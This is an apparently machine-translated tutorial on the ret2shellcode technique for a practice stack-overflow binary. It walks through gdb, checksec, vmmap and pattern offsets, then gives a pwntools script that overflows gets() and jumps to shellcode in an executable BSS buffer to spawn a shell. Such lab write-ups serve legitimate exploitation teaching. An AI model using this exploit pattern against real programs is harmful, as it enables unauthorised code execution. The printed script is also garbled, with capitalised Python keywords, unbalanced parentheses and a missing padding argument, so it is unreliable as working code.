Shulou(Shulou.com)06/01 Report--

Video of this article:

If the text is too boring, watch the online video: https://edu.51cto.com/sd/16514

Basics:

Ret2shellcode, that is, the control program executes shellcode code. Shellcode refers to the assembly code used to complete a function. The common function is to obtain the shell of the target system. Generally speaking, shellcode needs to be populated by ourselves. This is actually another typical use, that is, we need to fill in some executable code ourselves.

On the basis of stack overflow, in order to execute shellcode, the corresponding binary is required to have executable permissions in the area where the shellcode is located at runtime.

Step 1: analyze the program code

Using the gdb. / ret2shellcode loader, enter checksec on the command line to view the enabled protection

You can find that no protection is enabled

Let's use disass main to look at the assembly code for the main function.

Here we analyze the strncpy function. The api of strncpy is: char * strncpy (char * dest,char * src,int size_t); the first parameter is the received variable, the second is copied from there, and the third is how much to copy. After analysis, the first parameter is [esp], the second parameter is [esp+0x4], and the third parameter is [esp+0x8], so we know that the final copy will be put in [esp], and now [esp] is 0x804a080.

After analysis, it is found that the gets function and the strncpy function are called, in which the gets function has an overflow vulnerability, but the program does not use system ("/ bin/sh"). We can try to make the program jump to our shellcode, that is to say, the gets function no longer receives ordinary strings but the shellcode we have built.

Let's see where the 0x804a080 address is:

The first method: use IDA

The second method: run readelf in gdb, or run readelf-S xxx in shell of linux to check the location of bss segment

It is a BSS segment. If we can put shellcode in the bss segment, and then change the return value of the function to 0x804a080, we still lack a condition, that is, whether the bss segment 0x804a080 has execution permission. Let's debug the breakpoint:

Execute b main to make breakpoint

Execute r to run the program

Execute vmmap to see if you have permission to execute

The range of 0x804a080 is from 0x0804a000 to 0x0804b000, with x execution permission.

Step 2: find the offset of the program overflow

Re-execute the gdb. / ret2shellcode command loader

Execute pattern create 200to create a string

Execute r run

Enter the string you just created

To get the 0x41384141 address, we use pattern offset 0x41384141 to see the offset

Then you can think of the overflow code:

From pwn import *

P = process ('. / ret2shellcode')

Shellcode = asm (shellcraft.sh ())

Buf2_addr = 0x804a080

P.sendline (shellcode.ljust (112)) + p32 (buf2_addr))

P.interactive ()

#

The purpose of this code of shellcode.ljust is to fill with a where the length of shellcode is less than 112.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.